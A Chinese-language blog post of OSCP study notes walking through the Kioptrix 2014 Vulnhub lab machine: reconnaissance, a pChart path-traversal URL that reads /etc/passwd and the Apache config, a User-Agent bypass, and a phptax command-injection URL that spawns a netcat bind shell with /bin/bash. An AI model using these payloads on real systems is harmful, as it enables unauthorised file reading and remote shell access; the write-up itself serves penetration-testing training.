EthanDoctor

OSCP备考_0x05_Vulnhub靶机_KIOPTRIX:2014 (#5)

Ethan医生5个月前靶场162
名称说明
靶机下载链接https://www.vulnhub.com/entry/kioptrix-2014-5,62/
攻击机(kali)ip:192.168.233.168
靶机(CentOS)ip:192.168.233.167

信息收集

arp-scan

image.png


nmap

image.png

80端口访问


image.png

image.png


8080端口限制访问


image.png


查看F12发现head里面 出现pChart2.1.3/index.php

image.png


http://192.168.233.172/pChart2.1.3/examples/index.php 访问看看

image.png


使用searchsploit 看看有没有pchart漏洞


image.png

cat /usr/share/exploitdb/exploits/php/webapps/31173.txt查看

image.png

http://192.168.233.172/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

image.png


这样就可以看8080端口出现啥限制

http://192.168.233.172/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

image.png

可以接收 env=Mozilla4_browser



image.png


image.png


固定修改UA头

谷歌phptax exploit,发现一个rce

https://www.exploit-db.com/exploits/21665



http://192.168.233.172/phptax/drawimage.php?pfilez=xxx; nc -l -v -p 23235 -e /bin/bash;&pdf=make



内核提权






























标签: OSCP
返回列表

上一篇:OSCP备考_0x04_Vulnhub靶机_KIOPTRIX:LEVEL1.3(#4)

下一篇:OSCP备考_0x06_Vulnhub靶机_Tr0ll: 1

相关文章

OSCP备考_0x24_HackThBox靶机_Linux_Traverxec

OSCP备考_0x24_HackThBox靶机_Linux_Traverxec

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.21.112 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x44_HackThBox靶机_Windows_ Silo

OSCP备考_0x44_HackThBox靶机_Windows_ Silo

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.188 (扫描TCP)http都没有查看到可以利用的点这边直接是看看orcal的漏...

OSCP备考_0x03_Vulnhub靶机_KIOPTRIX:LEVEL1.2(#3)

OSCP备考_0x03_Vulnhub靶机_KIOPTRIX:LEVEL1.2(#3)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-12-3,24/攻击机(kali)ip:192.168.233.168靶机(CentOS)...

OSCP备考_0x15_HackThBox靶机_Linux_networked

OSCP备考_0x15_HackThBox靶机_Linux_networked

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.204.201 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x57_HackThBox靶机_Windows_Love

OSCP备考_0x57_HackThBox靶机_Windows_Love

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.48.103 (扫描TCP)绑定域名 http://10.129.48.103...

OSCP备考_0x21_HackThBox靶机_Linux_frolic

OSCP备考_0x21_HackThBox靶机_Linux_frolic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.135.112 (扫描TCP)nmap -p139,445 -A -T5 --scrip...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Copyright Your hacksec.top Rights Reserved.

Powered By Z-BlogPHP. - 鄂ICP备2025099786号